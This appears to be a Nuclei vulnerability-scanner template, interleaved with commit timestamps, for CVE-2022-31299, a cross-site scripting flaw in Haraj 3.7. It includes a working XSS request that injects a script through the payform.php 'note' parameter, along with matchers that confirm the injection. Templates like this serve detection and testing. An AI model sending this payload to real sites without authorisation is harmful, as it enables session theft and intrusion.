2022-09-15 11:58:57 +00:00
id : CVE-2022-31299
info :
2022-09-23 17:53:08 +00:00
name : Haraj 3.7 - Cross-Site Scripting
2022-09-15 11:58:57 +00:00
author : edoardottt
2022-09-23 18:06:19 +00:00
severity : medium
2022-09-16 10:58:33 +00:00
description : |
2022-09-23 17:53:08 +00:00
Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation : |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-09-15 11:58:57 +00:00
reference :
- https://github.com/bigzooooz/CVE-2022-31299
2022-09-18 05:06:01 +00:00
- https://angtech.org
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
2023-07-11 19:49:27 +00:00
- https://angtech.org/product/view/3
2024-01-29 17:11:14 +00:00
- https://github.com/trhacknon/Pocingit
2022-09-15 11:58:57 +00:00
classification :
2022-09-18 05:06:01 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-15 11:58:57 +00:00
cve-id : CVE-2022-31299
2022-09-18 05:06:01 +00:00
cwe-id : CWE-79
2024-01-14 13:49:27 +00:00
epss-score : 0.00209
2024-03-23 09:28:19 +00:00
epss-percentile : 0.58245
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*
2022-09-16 10:58:33 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : angtech
product : haraj
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,haraj,xss,angtech
2022-09-15 11:58:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-15 11:58:57 +00:00
- method : GET
path :
2022-09-16 10:58:33 +00:00
- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
2022-09-15 11:58:57 +00:00
matchers-condition : and
matchers :
2022-09-16 10:58:33 +00:00
- type : word
part : body
words :
- '><script>alert(document.domain)</script></textarea>'
- 'content="nextHaraj'
2022-09-16 17:46:43 +00:00
condition : and
2022-09-15 11:58:57 +00:00
- type : word
part : header
words :
- "text/html"
2022-09-16 10:58:33 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950